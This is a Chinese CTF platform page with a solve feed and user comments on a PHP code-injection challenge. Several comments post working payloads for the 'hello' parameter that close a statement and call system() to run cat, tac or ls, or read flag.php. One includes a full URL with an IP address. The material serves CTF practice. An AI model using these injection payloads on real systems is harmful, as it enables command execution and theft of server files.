评分(10)
解题动态
Niko_83c 攻破了该题 59分钟前
542698 攻破了该题 1小时前
slsdy 攻破了该题 4小时前
IamnotLin 攻破了该题 12小时前
zzZxby 攻破了该题 15小时前
yyc4088 攻破了该题 16小时前
xhonggcc 攻破了该题 19小时前
570570 攻破了该题 20小时前
lilym 攻破了该题 20小时前
color111111 攻破了该题 1天前
18996315220 攻破了该题 1天前
BLX123 攻破了该题 1天前
xjn12 攻破了该题 1天前
SDLbyZ 攻破了该题 1天前
771232546 攻破了该题 2天前
19941759966 攻破了该题 2天前
lancertyk 攻破了该题 2天前
zdabajfk 攻破了该题 2天前
---snow--- 攻破了该题 2天前
评论
daosheng 6月前
举报
?hello=);system('cat /f*'
lordinglord 7月前
举报
构造闭合,?hello=);var_dump(file_get_contents('flag.php'));//
金智秀的老公 7月前
举报
金智秀的老公到此一游
Pixelw 7月前
举报
http://117.72.52.127:15551/?hello=system(%27tac%20flag.php%27)
Pixelw 7月前
举报
Too Young Too Simple
lfs451 7月前
举报
?hello=highlight_file(%27flag.php%27)
传奇吉他手千早爱音 7月前
举报
比F和弦简单
liuguowang75 8月前
举报
/?hello=system('ls') /?hello=system('cat flag.php')
HK1ng 8月前
举报
这里看了下面的评论,一直没搞懂为什么不用cat flag.php,然后我实验了一下,发现不直接显示内容,而是显示?>,但是如果右击查看源码就能发现flag的内容,而tac flag就能在页面直接看到flag,这是因为,当浏览器识别到<?php,就自动把它当作是未闭合的 PHP 标签,就会将其隐藏,而如果反转一下<?就识别不出来,就会当成是字符串输出。
一个姓⎝李⎠的师傅~ 4月前
举报
@Gargantua 因为浏览器遇到 <?php 这种特殊非 html 标准标签时,会触发浏览器自己的容错机制,把 php 代码字符串用灰色字符保留下来再源码中,但是不会当做字符串显示在浏览器上,更不会执行!
Gargantua 8月前
举报
这是什么原因呢?是不是因为浏览器将php代码执行了啊
zhwen 8月前
举报
代码闭合并执行命令,GLOBALS); system('cat flag.php|base64'